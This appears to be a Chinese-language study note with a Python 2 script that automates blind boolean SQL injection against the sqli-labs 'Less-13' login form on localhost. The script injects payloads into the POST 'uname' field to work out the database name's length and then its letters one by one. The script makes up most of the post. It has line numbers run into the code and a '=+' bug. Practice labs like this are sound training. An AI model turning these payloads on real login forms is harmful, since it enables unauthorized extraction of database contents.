代码思路
1.主要还是参考了别人的代码,确实自己写的和别人写的出路很大,主要归咎还是自己代码能力待提高吧。
2.将功能集合成一个函数,然后通过*args这个小技巧去调用。函数的参数不是argv的值,但是*argv的是。也就是如下:
3.还有就是利用了format,因为是POST所有不好直接设置,但是通过format效果就好得多。
1 #!/usr/bin/env python 2 #encoding:utf-8 3 #by i3ekr 4 5 import requests 6 url = "http://127.0.0.1/Less-13/?id=1" 7 database_length_payload = "abc' ) or length((select database()))={0} #" 8 database_name_payload = "xxxxxxxxx')or(select substr((select database()),{0},1))='{1}' # &passwd=1" 9 database_length = 0 10 database_name = "" 11 def get_value(payload,value,*args): 12 if len(args) == 0: 13 payload = payload.format(value) 14 data = {"uname":payload,"passwd":"1"} 15 else: 16 payload = payload.format(value,args[0]) 17 data = {"uname":payload,"passwd":"1"} 18 19 print "[*] payload:%s"%(data) 20 html = requests.post(url,data=data) 21 if "flag.jpg" in html.text: 22 return True 23 else: 24 return False 25 26 for i in range(100): 27 if(get_value(database_length_payload,i)): 28 database_length =+ i 29 break 30 31 for n in range(1,database_length+1): 32 for s in "qwertyuiopasdfghjklzxcvbnm": 33 if(get_value(database_name_payload,n,s)): 34 database_name +=s 35 break 36 37 print database_name 38 print database_length
